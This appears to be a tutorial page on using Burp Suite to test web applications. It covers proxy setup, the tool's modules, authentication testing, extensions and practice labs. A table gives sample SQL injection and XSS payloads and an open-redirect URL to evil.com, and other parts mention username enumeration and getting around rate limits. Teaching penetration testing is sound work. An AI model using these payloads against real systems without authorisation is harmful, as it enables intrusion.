Skip to content

Burp Suite

🧠 What is Burp Suite?

Burp Suite is a powerful web security testing tool developed by PortSwigger. It allows testers to intercept, analyze, and manipulate HTTP/S traffic between a browser and a target application to find vulnerabilities.

πŸ’» 1. Installation & Setup

🐧 Linux / πŸͺŸ Windows / 🍎 macOS

Download Community or Professional Edition:
πŸ‘‰ https://portswigger.net/burp

🐳 Docker (optional for headless scanning)

Burp is GUI-based β€” Docker is not common unless for Burp REST APIs or Enterprise Edition.

🌐 2. Configure Your Browser

A. Set Proxy

  1. Burp default: 127.0.0.1:8080

  2. Set this in browser proxy settings

B. Install Burp's SSL Certificate

  1. Visit http://burpsuite

  2. Download CA Certificate

  3. Import into browser (Trusted Root CA store)

βœ… Necessary for HTTPS traffic interception

🧭 3. Burp Suite Modules Overview

Tool Description
Proxy Intercepts HTTP requests/responses
Target Site map + scope definition
Repeater Modify and resend requests manually
Intruder Automated fuzzing/parameter tampering
Scanner Automated vulnerability scanner (Pro only)
Decoder Encode/decode data (Base64, URL, etc.)
Comparer Diff responses to find changes
Extender Add community/custom extensions (BApp Store)

πŸ”Œ 4. Manual Testing Workflow

Step-by-Step:

4.1 Intercept and Analyze Traffic

  • Turn Intercept ON

  • Visit site in browser

  • Examine requests in HTTP history

4.2 Define Scope

  • Go to Target > Scope

  • Include only the relevant host

  • Reduces noise and helps focus scan

4.3 Use Repeater

  • Right-click > Send to Repeater

  • Modify headers, params, cookies

  • View response on each variation

4.4 Use Intruder (Manual Fuzzing)

  • Send request to Intruder

  • Mark injection points: Β§paramΒ§

  • Choose attack type (Sniper, Battering Ram, Pitchfork, Cluster Bomb)

  • Load payloads (common values, wordlists)

  • Start attack & analyze status codes, length, response

βš”οΈ 5. Automated Testing with Burp Scanner (Pro Only)

Passive Scan:

  • Analyze responses for issues (e.g., info leaks, insecure headers)

  • Happens automatically when requests pass through proxy

Active Scan:

  • Right-click request > "Scan"

  • Burp injects payloads to detect:

    • SQLi, XSS

    • CSRF

    • Open redirects

    • Broken auth/session handling

Reporting:

  • Go to Dashboard > Issues

  • Click each to see evidence & remediation

  • Export as HTML/XML

❗ Burp Community does not support active scanning.

πŸ” 6. Testing with Authentication

  • Log in via browser (via Burp)

  • Copy session cookie from Proxy or Repeater

  • Use it in further requests manually

B. Basic Auth

  • Add Authorization: Basic base64(username:password)

C. JWT Tokens

  • Analyze JWT structure in Decoder

  • Test for insecure algorithms (none, weak secret)

D. Re-auth With Macros (Pro)

  • Project Options > Sessions > Add macro to auto re-authenticate when session expires

πŸͺ 7. Advanced Tools

πŸ” Repeater Tricks

  • Bruteforce with different payloads manually

  • Bypass client-side validation

  • Modify CSRF tokens, headers, etc.

πŸ’£ Intruder Use Cases

  • Fuzzing

  • Username enumeration

  • Hidden directory/file discovery

  • Rate-limiting bypass

🧩 BApp Store Extensions

Go to: Extender > BApp Store
Popular extensions:

  • Autorize: Test authz issues

  • Logger++: Advanced request/response logs

  • SAML Raider: SAML token manipulation

  • JWT Editor: Decode & modify JWTs

  • ActiveScan++: Enhances Pro scanner

πŸ§ͺ 8. Manual Vulnerability Testing Examples

Vulnerability How to Test Manually (Repeater/Intruder)
SQL Injection ' or '1'='1; ' union select null--
XSS <script>alert(1)</script> in query/body
CSRF Copy form, remove token, replay
Broken Auth Modify session cookies, try forceful browsing
Open Redirect /redirect?url=https://evil.com
Insecure Headers Check absence of Content-Security-Policy, X-Frame-Options

πŸ” 9. Best Practices

Practice Why it helps
Set scope early Avoid scanning third-party or irrelevant domains
Use context menus "Send to Repeater", "Do Interception" etc.
Sanitize your logs Remove sensitive data before sharing/reporting
Test logout + session mgmt To detect session fixation, hijacking risks
Use different user roles AuthZ testing: normal vs admin users
Log everything Use Logger++ or Burp Logger

πŸ§ͺ 10. Practice Labs

docker run -it -p 80:80 vulnerables/web-dvwa

docker run -p 3000:3000 bkimminich/juice-shop

πŸ“¦ 11. Export Reports

Pro Version Only:

  • Dashboard > Issues > Generate Report

  • Formats: HTML / XML / CSV / Burp format (.burp)

πŸ“š 12. Learn More